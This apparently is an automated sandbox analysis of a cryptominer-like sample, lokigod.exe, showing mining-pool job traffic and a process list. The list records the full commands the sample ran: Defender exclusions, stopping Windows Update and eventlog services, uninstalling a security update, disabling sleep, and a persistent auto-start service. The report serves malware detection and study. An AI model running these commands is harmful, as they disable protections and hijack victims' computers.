                                      2024-12-04 16:06:44 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 33 66 63 63 31 62 61 30 36 66 63 65 39 64 63 36 65 30 36 38 62 34 63 66 30 66 66 61 37 64 33 66 31 31 30 37 66 36 39 66 35 65 30 63 36 37 61 31 34 63 39 32 31 33 64 35 33 33 66 63 34 64 64 33 63 36 39 31 32 63 38 36 38 30 30 30 30 30 30 30 30 62 31 33 31 34 62 37 66 33 36 32 65 33 32 31 32 38 63 33 32 39 37 66 34 35 64 37 32 64 36 31 62 33 39 63 61 36 65 61 31 36 33 65 34 64 64 34 36 35 32 37 33 31 62 33 32 34 31 64 37 37 37 61 31 32 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 35 30 65 64 39 32 62 63 2d 37 65 34 64 2d 34 35 30 61 2d 38 36 39 32 2d 36 38 36 38 35 37 38 34 65 34 64 31 22 2c 22 74 61
                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101093fcc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c86800000000b1314b7f362e32128c3297f45d72d61b39ca6ea163e4dd4652731b3241d777a128","job_id":"50ed92bc-7e4d-450a-8692-68685784e4d1","ta
                                      2024-12-04 16:07:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 33 66 63 63 31 62 61 30 36 66 63 65 39 64 63 36 65 30 36 38 62 34 63 66 30 66 66 61 37 64 33 66 31 31 30 37 66 36 39 66 35 65 30 63 36 37 61 31 34 63 39 32 31 33 64 35 33 33 66 63 34 64 64 33 63 36 39 31 32 63 38 36 38 30 30 30 30 30 30 30 30 34 64 61 63 31 62 30 62 62 30 65 39 39 65 38 38 38 62 65 62 35 32 36 39 35 39 30 37 35 35 36 32 30 36 63 33 37 65 35 38 66 64 34 32 38 63 62 38 35 33 38 36 66 64 66 30 31 30 36 30 38 38 38 63 32 38 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 61 36 66 61 36 33 64 37 2d 66 65 39 66 2d 34 63 35 66 2d 62 64 38 34 2d 61 38 32 64 64 65 38 37 36 63 65 64 22 2c 22 74 61
                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101093fcc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c868000000004dac1b0bb0e99e888beb52695907556206c37e58fd428cb85386fdf01060888c28","job_id":"a6fa63d7-fe9f-4c5f-bd84-a82dde876ced","ta
                                      2024-12-04 16:07:06 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 39 66 63 63 31 62 61 30 36 66 63 65 39 64 63 36 65 30 36 38 62 34 63 66 30 66 66 61 37 64 33 66 31 31 30 37 66 36 39 66 35 65 30 63 36 37 61 31 34 63 39 32 31 33 64 35 33 33 66 63 34 64 64 33 63 36 39 31 32 63 38 36 38 30 30 30 30 30 30 30 30 35 35 66 65 36 38 65 66 64 65 38 31 65 63 38 36 31 39 33 32 62 36 32 38 62 37 37 66 32 37 32 30 66 62 30 66 39 30 64 63 32 63 37 31 36 62 30 61 32 37 31 38 64 64 61 61 37 30 37 65 33 66 32 64 33 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 32 38 36 64 31 63 33 35 2d 35 39 35 64 2d 34 37 39 61 2d 61 39 33 65 2d 37 35 39 34 35 34 63 64 63 64 31 38 22 2c 22 74 61
                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a9fcc1ba06fce9dc6e068b4cf0ffa7d3f1107f69f5e0c67a14c9213d533fc4dd3c6912c8680000000055fe68efde81ec861932b628b77f2720fb0f90dc2c716b0a2718ddaa707e3f2d30","job_id":"286d1c35-595d-479a-a93e-759454cdcd18","ta


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:11:04:57
                                      Start date:04/12/2024
                                      Path:C:\Users\user\Desktop\lokigod.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\lokigod.exe"
                                      Imagebase:0x7ff683c20000
                                      File size:5'265'920 bytes
                                      MD5 hash:769EA3D0E0CF22EAA7526A89C0F438CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:2
                                      Start time:11:04:57
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:11:04:58
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                      Imagebase:0x7ff64efc0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\wusa.exe
                                      Wow64 process (32bit):false
                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                      Imagebase:0x7ff786ec0000
                                      File size:345'088 bytes
                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:11:05:03
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe delete "LBFXRZGB"
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto"
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:31
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe start "LBFXRZGB"
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:32
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:33
                                      Start time:11:05:04
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:34
                                      Start time:11:05:05
                                      Start date:04/12/2024
                                      Path:C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe
                                      Imagebase:0x7ff721ec0000
                                      File size:5'265'920 bytes
                                      MD5 hash:769EA3D0E0CF22EAA7526A89C0F438CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 76%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:35
                                      Start time:11:05:05
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                      Imagebase:0x7ff7be880000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:36
                                      Start time:11:05:05
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:37
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                      Imagebase:0x7ff64efc0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:38
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:39
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:40
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:41
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\wusa.exe
                                      Wow64 process (32bit):false
                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                      Imagebase:0x7ff786ec0000
                                      File size:345'088 bytes
                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:42
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:43
                                      Start time:11:05:06
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:44
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:45
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:46
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop bits
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:47
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:48
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\sc.exe stop dosvc
                                      Imagebase:0x7ff6c9890000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:49
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:50
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:51
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff62edd0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:52
                                      Start time:11:05:07
                                      Start date:04/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:53
